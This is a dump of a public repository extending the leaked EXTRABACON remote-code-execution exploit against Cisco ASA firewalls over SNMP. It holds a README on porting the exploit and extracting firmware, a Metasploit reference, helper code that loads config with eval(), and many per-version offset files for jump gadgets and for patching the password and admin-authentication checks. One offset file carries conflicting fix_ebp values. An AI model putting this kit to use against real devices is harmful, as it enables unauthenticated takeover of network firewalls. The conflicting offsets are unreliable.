├── .gitignore ├── LICENSE ├── README.md ├── extrabacon-2.0 ├── Mexeggs │ ├── __init__.py │ ├── all.py │ ├── argparse.py │ ├── hexdump.py │ ├── log.py │ ├── loglib.py │ ├── sploit.py │ └── version.py ├── extrabacon_2.0.py ├── improved │ ├── grep-offsets.py │ ├── shellcode_8_0(2).py │ ├── shellcode_8_0(3).py │ ├── shellcode_8_0(3)6.py │ ├── shellcode_8_0(4).py │ ├── shellcode_8_0(4)32.py │ ├── shellcode_8_0(5).py │ ├── shellcode_8_2(1).py │ ├── shellcode_8_2(2).py │ ├── shellcode_8_2(3).py │ ├── shellcode_8_2(4).py │ ├── shellcode_8_2(5).py │ ├── shellcode_8_2(5)33.py │ ├── shellcode_8_2(5)41.py │ ├── shellcode_8_2(5)55.py │ ├── shellcode_8_3(1).py │ ├── shellcode_8_3(2).py │ ├── shellcode_8_3(2)39.py │ ├── shellcode_8_3(2)40.py │ ├── shellcode_8_4(1).py │ ├── shellcode_8_4(2).py │ ├── shellcode_8_4(3).py │ ├── shellcode_8_4(4).py │ ├── shellcode_8_4(4)1.py │ ├── shellcode_8_4(4)3.py │ ├── shellcode_8_4(4)5.py │ ├── shellcode_8_4(4)9.py │ ├── shellcode_8_4(6)5.py │ ├── shellcode_8_4(7).py │ ├── shellcode_9_0(1).py │ ├── shellcode_9_1(1)4.py │ ├── shellcode_9_2(1).py │ ├── shellcode_9_2(2)8.py │ ├── shellcode_9_2(3).py │ ├── shellcode_9_2(4).py │ └── shellcode_9_2(4)13.py ├── scapy │ ├── LICENSE │ ├── __init__.py │ ├── all.py │ ├── ansmachine.py │ ├── arch │ │ ├── __init__.py │ │ ├── bsd.py │ │ ├── linux.py │ │ ├── pcapdnet.py │ │ ├── solaris.py │ │ ├── unix.py │ │ └── windows │ │ │ └── __init__.py │ ├── as_resolvers.py │ ├── asn1 │ │ ├── __init__.py │ │ ├── asn1.py │ │ ├── ber.py │ │ └── mib.py │ ├── asn1fields.py │ ├── asn1packet.py │ ├── automaton.py │ ├── autorun.py │ ├── base_classes.py │ ├── config.py │ ├── crypto │ │ ├── __init__.py │ │ └── cert.py │ ├── dadict.py │ ├── data.py │ ├── error.py │ ├── fields.py │ ├── layers │ │ ├── __init__.py │ │ ├── all.py │ │ ├── bluetooth.py │ │ ├── dhcp.py │ │ ├── dhcp6.py │ │ ├── dns.py │ │ ├── dot11.py │ │ ├── gprs.py │ │ ├── hsrp.py │ │ ├── inet.py │ │ ├── inet6.py │ │ ├── ir.py │ │ ├── isakmp.py │ │ ├── l2.py │ │ ├── 
l2tp.py │ │ ├── llmnr.py │ │ ├── mgcp.py │ │ ├── mobileip.py │ │ ├── netbios.py │ │ ├── netflow.py │ │ ├── ntp.py │ │ ├── pflog.py │ │ ├── ppp.py │ │ ├── radius.py │ │ ├── rip.py │ │ ├── rtp.py │ │ ├── sebek.py │ │ ├── skinny.py │ │ ├── smb.py │ │ ├── snmp.py │ │ ├── tftp.py │ │ └── x509.py │ ├── main.py │ ├── modules │ │ ├── __init__.py │ │ ├── geoip.py │ │ ├── nmap.py │ │ ├── p0f.py │ │ ├── queso.py │ │ └── voip.py │ ├── packet.py │ ├── plist.py │ ├── pton_ntop.py │ ├── route.py │ ├── route6.py │ ├── sendrecv.py │ ├── supersocket.py │ ├── themes.py │ ├── tools │ │ ├── UTscapy.py │ │ ├── __init__.py │ │ └── check_asdis.py │ ├── utils.py │ ├── utils6.py │ └── volatile.py └── versions │ ├── converter.py │ ├── shellcode_asa802.py │ ├── shellcode_asa803.py │ ├── shellcode_asa803_6.py │ ├── shellcode_asa804.py │ ├── shellcode_asa804_32.py │ ├── shellcode_asa805.py │ ├── shellcode_asa821.py │ ├── shellcode_asa822.py │ ├── shellcode_asa823.py │ ├── shellcode_asa824.py │ ├── shellcode_asa825.py │ ├── shellcode_asa831.py │ ├── shellcode_asa832.py │ ├── shellcode_asa841.py │ ├── shellcode_asa842.py │ ├── shellcode_asa843.py │ └── shellcode_asa844.py ├── lina-offsets.py ├── metasploit ├── cisco_asa_extrabacon.rb └── cisco_asa_snmpoverflow.rb └── shellcode ├── clean.nasm ├── egg.nasm ├── genshellcode.py ├── shellcode.nasm └── writebytes.nasm /.gitignore: -------------------------------------------------------------------------------- 1 | # our files 2 | extrabacon-2.0/concernedparent/ 3 | 4 | # Byte-compiled / optimized / DLL files 5 | __pycache__/ 6 | *.py[cod] 7 | *$py.class 8 | 9 | # C extensions 10 | *.so 11 | 12 | # Distribution / packaging 13 | .Python 14 | env/ 15 | build/ 16 | develop-eggs/ 17 | dist/ 18 | downloads/ 19 | eggs/ 20 | .eggs/ 21 | lib/ 22 | lib64/ 23 | parts/ 24 | sdist/ 25 | var/ 26 | *.egg-info/ 27 | .installed.cfg 28 | *.egg 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller 
builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *,cover 49 | .hypothesis/ 50 | 51 | # Translations 52 | *.mo 53 | *.pot 54 | 55 | # Django stuff: 56 | *.log 57 | local_settings.py 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # IPython Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # dotenv 82 | .env 83 | 84 | # virtualenv 85 | venv/ 86 | ENV/ 87 | 88 | # Spyder project settings 89 | .spyderproject 90 | 91 | # Rope project settings 92 | .ropeproject 93 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2016 RiskSense 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2016-6366 2 | 3 | Public repository for improvements to the EXTRABACON exploit, a remote code execution exploit against the SNMP service of Cisco ASA, written by the Equation Group (NSA) and leaked by the Shadow Brokers. 4 | 5 | There is improved shellcode, a LINA offset finder script, a Metasploit module, and extrabacon-2.0. 6 | 7 | We are adding support for most versions of 8.x and 9.x in the near future, after we have tested each version on real hardware. 8 | 9 | ExtraBacon 2.0 uses improved shellcode with fewer stages than the Equation Group version, which makes it more reliable and shrinks the SNMP payload packet by roughly 150 bytes. The leaked version only supports 8.x; we have it working on 9.x versions as well. 10 | 11 | ### Supported Versions (so far) 12 | 13 | Using the Lina offset finder script, it should be trivial to support all vulnerable x86 versions, and we are working on doing just that. NOTE: the x64 builds (9.6 and later, to be confirmed) introduce DEP and ASLR, so the offset finder and the generic payload will not work against them. It should still be possible to easily DoS (crash) those versions, though. 14 | 15 | Open an issue if you would like us to support a specific version. It will move to the front of the line. 
16 | 17 | 8.x 18 | - 8.0(2) 19 | - 8.0(3) 20 | - 8.0(3)6 21 | - 8.0(4) 22 | - 8.0(4)32 23 | - 8.0(5) 24 | - 8.2(1) 25 | - 8.2(2) 26 | - 8.2(3) 27 | - 8.2(4) 28 | - 8.2(5) 29 | - 8.2(5)33 `*` 30 | - 8.2(5)41 `*` 31 | - 8.2(5)55 `*` 32 | - 8.3(1) 33 | - 8.3(2) 34 | - 8.3(2)39 `*` 35 | - 8.3(2)40 `*` 36 | - 8.3(2)-npe `*` `**` 37 | - 8.4(1) 38 | - 8.4(2) 39 | - 8.4(3) 40 | - 8.4(4) 41 | - 8.4(4)1 `*` 42 | - 8.4(4)3 `*` 43 | - 8.4(4)5 `*` 44 | - 8.4(4)9 `*` 45 | - 8.4(6)5 `*` 46 | - 8.4(7) `*` 47 | 48 | 9.x 49 | - 9.0(1) `*` 50 | - 9.1(1)4 `*` 51 | - 9.2(1) `*` 52 | - 9.2(2)8 `*` 53 | - 9.2(3) `*` 54 | - 9.2(4) `*` 55 | - 9.2(4)13 `*` 56 | 57 | `*` new version support not part of the original Shadow Brokers leak 58 | 59 | `**` We currently cannot distinguish a normal build from an NPE build using only the version strings returned over SNMP. The NPE offsets are commented out for now, because NPE builds are rare (they are the export-restricted variants with reduced encryption support); we would like to incorporate these versions in the future, probably as a boolean option to the exploit. 60 | 61 | ### Metasploit 62 | 63 | `use auxiliary/admin/cisco/cisco_asa_extrabacon` 64 | 65 | https://github.com/rapid7/metasploit-framework/pull/7359 66 | 67 | Our initial pull request has been merged into the Metasploit master branch. We will keep contributing offsets upstream, but new offsets may appear in this repository first, depending on how quickly future pull requests are merged. 68 | 69 | ### Contributing 70 | If you can test ASA versions, consider forking this project and generating payloads. We could mass-generate the payloads, but we only want to publish offsets after testing on hardware that every payload exits cleanly. 71 | 72 | You can add new payloads to the `extrabacon-2.0/improved/` folder after using `lina-offsets.py` to generate the file. Modules are named `shellcode_verstring.py`, where verstring is the version string returned by the ASA, with periods (.) replaced with underscores (_). 73 | 74 | Also submit pull requests stripping any unnecessary Python from the ExtraBacon 2.0 code. One concrete cleanup: `Mexeggs/version.py` loads verinfo files with `eval()`, so a crafted verinfo file executes arbitrary code in the operator's Python process; `ast.literal_eval()` parses the same lists of tuples without that risk. 
75 | 76 | ### Lina offset finder 77 | `python2 ./lina-offsets.py asa_lina_XXX.elf` 78 | 79 | This automatically generates the offsets needed to port the exploit to other versions of ASA. 80 | 81 | Right now it takes us longer to load a version of ASA firmware and test it than it does to generate offsets for a specific version. 82 | 83 | The only value the script does not calculate is FIX_EBP, which is usually 0x48 (72) or 0x58 (88); 8.4(1) and later appear to use 0x48. It must be set by hand, so check it against a tested neighbouring version before publishing the offsets. 84 | 85 | You can extract Lina like this: 86 | 87 | `binwalk -e asaXXX-k8.bin` 88 | `cd _asaXXX-extracted` 89 | `cpio -idv < rootfs.img` 90 | `cp asa/bin/lina /tmp/linaXXX` 91 | 92 | ### Licenses 93 | 94 | - ExtraBacon 2.0 Python code is GPLv2 (as it uses Scapy) 95 | - Metasploit module is MSF license (3-clause BSD) 96 | - Everything else is MIT 97 | 98 | 99 | ### References 100 | - http://zerosum0x0.blogspot.com/2016/09/reverse-engineering-cisco-asa-for.html 101 | - https://blog.silentsignal.eu/2016/08/25/bake-your-own-extrabacon/ 102 | - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp 103 | -------------------------------------------------------------------------------- /extrabacon-2.0/Mexeggs/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RiskSense-Ops/CVE-2016-6366/0ba7426a9bf2a01c807608b7e1b63f87fe2699a5/extrabacon-2.0/Mexeggs/__init__.py -------------------------------------------------------------------------------- /extrabacon-2.0/Mexeggs/all.py: -------------------------------------------------------------------------------- 1 | from sploit import * 2 | from version import * 3 | -------------------------------------------------------------------------------- /extrabacon-2.0/Mexeggs/hexdump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | 4 | def hexdump(x,lead="[+] 
",out=sys.stdout): 5 | ''' 6 | 7 | 8 | 9 | 10 | ''' 11 | 12 | x=str(x) 13 | l = len(x) 14 | i = 0 15 | while i < l: 16 | print >>out, "%s%04x " % (lead,i), 17 | for j in range(16): 18 | if i+j < l: 19 | print >>out, "%02X" % ord(x[i+j]), 20 | else: 21 | print >>out, " ", 22 | if j%16 == 7: 23 | print >>out, "", 24 | print >>out, " ", 25 | print >>out, sane(x[i:i+16]) 26 | i += 16 27 | 28 | def sane(x): 29 | ''' 30 | 31 | ''' 32 | 33 | 34 | r="" 35 | for i in x: 36 | j = ord(i) 37 | if (j < 32) or (j >= 127): 38 | r=r+"." 39 | else: 40 | r=r+i 41 | return r 42 | -------------------------------------------------------------------------------- /extrabacon-2.0/Mexeggs/log.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | import loglib 4 | 5 | class Log(loglib.AbstractLog): 6 | def __init__(self, name, version): 7 | super(Log, self).__init__(name, version) 8 | 9 | def packet(self, event, data): 10 | return self(event, params = {'packet': ' '.join(['%02x' % ord(byte) for byte in data])}) 11 | 12 | -------------------------------------------------------------------------------- /extrabacon-2.0/Mexeggs/version.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import sys 4 | 5 | 6 | class DictionaryOfTuples: 7 | def __init__(self, filename, globals = None, locals = None): 8 | if not globals: 9 | globals = {} 10 | if not locals: 11 | locals = {} 12 | 13 | self.filename = filename 14 | 15 | 16 | lines = [] 17 | f = open(filename,'r') 18 | for line in f.readlines(): 19 | line = line.strip() 20 | if line.startswith('('): 21 | lines.append(line) 22 | f.close() 23 | 24 | 25 | expression = "[\n%s\n]" % "\n".join(lines) 26 | tuples = eval(expression, globals, locals) 27 | 28 | 29 | self.info = {} 30 | for e in tuples: 31 | if e[0] in self and self[e[0]] != e[1]: 32 | raise RuntimeError,"data mismatch -- %s has multiple values: %s and %s" % (e[0], 
self[e[0]], e[1]) 33 | else: 34 | self[e[0]] = e[1] 35 | 36 | def __len__(self): 37 | return len(self.info) 38 | 39 | def __contains__(self, item): 40 | return item in self.info 41 | 42 | def __getitem__(self, key): 43 | return self.info[key] 44 | 45 | def __setitem__(self, key, value): 46 | self.info[key] = value 47 | 48 | def has_key(self, key): 49 | return key in self 50 | 51 | def validate(self, required, verbose = False): 52 | valid = True 53 | 54 | for kw in required: 55 | if not kw in self: 56 | if verbose: print "Missing %s"%kw 57 | valid = False 58 | else: 59 | if verbose: print "Has %-20s =" % kw, _xprint(self[kw]) 60 | 61 | if verbose: 62 | if valid: 63 | print "verinfo file is valid" 64 | else: 65 | print "verinfo file is not valid" 66 | 67 | print '-'*40 68 | 69 | return valid 70 | 71 | def dump(self, req, opt, verbose = 0): 72 | out = "" 73 | 74 | for kw in opt: 75 | if kw in self: 76 | out += '("%s","%s"),\n' % (kw, _xprint(self[kw])) 77 | out += "#-"*30 + '\n' 78 | for kw in req: 79 | out += '("%s","%s"),\n' % (kw, _xprint(self[kw])) 80 | 81 | return out 82 | 83 | 84 | def _xprint(x): 85 | try: out = '0x%x'%(long(x)&0xffffffffL) 86 | except: out = '"%s"'%x 87 | return out 88 | 89 | 90 | if __name__ == '__main__': 91 | import unittest 92 | import version_test 93 | runner = unittest.TextTestRunner() 94 | runner.run(version_test.suite) 95 | 96 | -------------------------------------------------------------------------------- /extrabacon-2.0/improved/grep-offsets.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | """ 4 | Crappy script that reads the offsets in the Metasploit module, 5 | turns it into json, and write Python files 6 | """ 7 | 8 | import json 9 | 10 | def parse_offsets(data): 11 | data = data.split("@offsets = {")[1] 12 | data = data.split("}")[0] 13 | 14 | str = "{" 15 | for line in data.split("\n"): 16 | line = line.strip() 17 | line = line.split("#")[0] 18 | str += 
line 19 | 20 | str += "}" 21 | data = json.loads(str.replace("=>", ":")) 22 | 23 | for key, value in data.iteritems(): 24 | str = "##\n## this file autogenerated\n" 25 | str += "## " + key + "\n##\n\n" 26 | 27 | str += "jmp_esp_offset = \"" + value[0] + "\"\n" 28 | str += "saferet_offset = \"" + value[1] + "\"\n" 29 | str += "fix_ebp = \"" + value[2] + "\"\n" 30 | str += "pmcheck_bounds = \"" + value[3] + "\"\n" 31 | str += "pmcheck_offset = \"" + value[4] + "\"\n" 32 | str += "pmcheck_code = \"" + value[5] + "\"\n" 33 | str += "admauth_bounds = \"" + value[6] + "\"\n" 34 | str += "admauth_offset = \"" + value[7] + "\"\n" 35 | str += "admauth_code = \"" + value[8] + "\"\n" 36 | 37 | str += '\n\n# "%s" = ["%s"],' % (key, '","'.join(value)) 38 | 39 | fname = "shellcode_" + key.replace(".", "_") + ".py" 40 | print fname 41 | with open(fname, "w") as f: 42 | f.write(str) 43 | 44 | if __name__ == '__main__': 45 | import sys 46 | data = open(sys.argv[1]).read() 47 | parse_offsets(data) 48 | -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_0(2).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.0(2) 4 | ## 5 | 6 | jmp_esp_offset = "155.222.211.8" 7 | saferet_offset = "44.103.159.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.224.6.9" 10 | pmcheck_offset = "32.237.6.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.80.6.8" 13 | admauth_offset = "48.90.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.0(2)" = ["155.222.211.8","44.103.159.8","88","0.224.6.9","32.237.6.9","85.49.192.137","0.80.6.8","48.90.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_0(3).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.0(3) 4 | ## 5 | 6 | 
jmp_esp_offset = "141.123.131.9" 7 | saferet_offset = "156.138.160.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.128.9.9" 10 | pmcheck_offset = "112.130.9.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.96.6.8" 13 | admauth_offset = "176.96.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.0(3)" = ["141.123.131.9","156.138.160.8","88","0.128.9.9","112.130.9.9","85.49.192.137","0.96.6.8","176.96.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_0(3)6.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.0(3)6 4 | ## 5 | 6 | jmp_esp_offset = "191.143.24.9" 7 | saferet_offset = "28.158.161.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.0.11.9" 10 | pmcheck_offset = "224.1.11.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.96.6.8" 13 | admauth_offset = "112.101.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.0(3)6" = ["191.143.24.9","28.158.161.8","88","0.0.11.9","224.1.11.9","85.49.192.137","0.96.6.8","112.101.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_0(4).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.0(4) 4 | ## 5 | 6 | jmp_esp_offset = "109.188.26.9" 7 | saferet_offset = "140.100.168.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.96.19.9" 10 | pmcheck_offset = "128.101.19.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.96.6.8" 13 | admauth_offset = "176.104.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.0(4)" = ["109.188.26.9","140.100.168.8","88","0.96.19.9","128.101.19.9","85.49.192.137","0.96.6.8","176.104.6.8","85.137.229.87"], -------------------------------------------------------------------------------- 
/extrabacon-2.0/improved/shellcode_8_0(4)32.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.0(4)32 4 | ## 5 | 6 | jmp_esp_offset = "157.6.31.9" 7 | saferet_offset = "44.20.171.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.176.23.9" 10 | pmcheck_offset = "0.176.23.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.96.6.8" 13 | admauth_offset = "48.105.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.0(4)32" = ["157.6.31.9","44.20.171.8","88","0.176.23.9","0.176.23.9","85.49.192.137","0.96.6.8","48.105.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_0(5).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.0(5) 4 | ## 5 | 6 | jmp_esp_offset = "253.116.31.9" 7 | saferet_offset = "204.64.171.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.32.24.9" 10 | pmcheck_offset = "64.32.24.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.96.6.8" 13 | admauth_offset = "128.107.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.0(5)" = ["253.116.31.9","204.64.171.8","88","0.32.24.9","64.32.24.9","85.49.192.137","0.96.6.8","128.107.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(1).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(1) 4 | ## 5 | 6 | jmp_esp_offset = "147.242.43.9" 7 | saferet_offset = "108.154.181.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.0.36.9" 10 | pmcheck_offset = "240.14.36.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.208.6.8" 13 | admauth_offset = "16.215.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(1)" = 
["147.242.43.9","108.154.181.8","88","0.0.36.9","240.14.36.9","85.49.192.137","0.208.6.8","16.215.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(2).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(2) 4 | ## 5 | 6 | jmp_esp_offset = "150.54.28.9" 7 | saferet_offset = "124.0.184.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.224.41.9" 10 | pmcheck_offset = "32.227.41.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.208.6.8" 13 | admauth_offset = "64.221.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(2)" = ["150.54.28.9","124.0.184.8","88","0.224.41.9","32.227.41.9","85.49.192.137","0.208.6.8","64.221.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(3).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(3) 4 | ## 5 | 6 | jmp_esp_offset = "45.0.7.8" 7 | saferet_offset = "252.42.185.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.96.43.9" 10 | pmcheck_offset = "128.111.43.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.240.6.8" 13 | admauth_offset = "144.241.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(3)" = ["45.0.7.8","252.42.185.8","88","0.96.43.9","128.111.43.9","85.49.192.137","0.240.6.8","144.241.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(4).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(4) 4 | ## 5 | 6 | jmp_esp_offset = "93.172.49.9" 7 | saferet_offset = "236.91.185.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.176.43.9" 10 | pmcheck_offset = "96.187.43.9" 11 | 
pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.240.6.8" 13 | admauth_offset = "16.242.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(4)" = ["93.172.49.9","236.91.185.8","88","0.176.43.9","96.187.43.9","85.49.192.137","0.240.6.8","16.242.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(5).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(5) 4 | ## 5 | 6 | jmp_esp_offset = "253.13.54.9" 7 | saferet_offset = "156.229.185.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.16.48.9" 10 | pmcheck_offset = "96.28.48.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.240.6.8" 13 | admauth_offset = "64.242.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(5)" = ["253.13.54.9","156.229.185.8","88","0.16.48.9","96.28.48.9","85.49.192.137","0.240.6.8","64.242.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(5)33.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(5)33 4 | ## 5 | 6 | jmp_esp_offset = "157.218.29.8" 7 | saferet_offset = "236.190.186.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.80.50.9" 10 | pmcheck_offset = "96.92.50.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.240.6.8" 13 | admauth_offset = "192.242.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(5)33" = ["157.218.29.8","236.190.186.8","88","0.80.50.9","96.92.50.9","85.49.192.137","0.240.6.8","192.242.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(5)41.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(5)41 4 
| ## 5 | 6 | jmp_esp_offset = "77.90.18.8" 7 | saferet_offset = "188.9.187.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.160.50.9" 10 | pmcheck_offset = "16.168.50.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.240.6.8" 13 | admauth_offset = "16.243.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(5)41" = ["77.90.18.8","188.9.187.8","88","0.160.50.9","16.168.50.9","85.49.192.137","0.240.6.8","16.243.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(5)55.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(5)55 4 | ## 5 | 6 | jmp_esp_offset = "237.237.29.8" 7 | saferet_offset = "156.51.187.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.224.50.9" 10 | pmcheck_offset = "48.235.50.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.240.6.8" 13 | admauth_offset = "16.243.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(5)55" = ["237.237.29.8","156.51.187.8","72","0.224.50.9","48.235.50.9","85.49.192.137","0.240.6.8","16.243.6.8","85.137.229.87"],  # NOTE(review): fix_ebp above is "88" but the third element of this array is "72" -- one of them is wrong; confirm which value was tested on hardware before relying on this version 18 | -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_3(1).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.3(1) 4 | ## 5 | 6 | jmp_esp_offset = "111.187.14.8" 7 | saferet_offset = "140.140.194.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.112.53.9" 10 | pmcheck_offset = "240.119.53.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.208.6.8" 13 | admauth_offset = "48.221.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.3(1)" = ["111.187.14.8","140.140.194.8","88","0.112.53.9","240.119.53.9","85.49.192.137","0.208.6.8","48.221.6.8","85.137.229.87"], -------------------------------------------------------------------------------- 
/extrabacon-2.0/improved/shellcode_8_3(2).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.3(2) 4 | ## 5 | 6 | jmp_esp_offset = "220.203.69.9" 7 | saferet_offset = "252.36.195.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.80.54.9" 10 | pmcheck_offset = "144.84.54.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.208.6.8" 13 | admauth_offset = "16.222.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.3(2)" = ["220.203.69.9","252.36.195.8","88","0.80.54.9","144.84.54.9","85.49.192.137","0.208.6.8","16.222.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_3(2)39.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.3(2)39 4 | ## 5 | 6 | jmp_esp_offset = "143.212.14.8" 7 | saferet_offset = "124.48.196.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.128.59.9" 10 | pmcheck_offset = "176.136.59.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.224.6.8" 13 | admauth_offset = "32.228.6.8" 14 | admauth_code = "85.137.229.87" 15 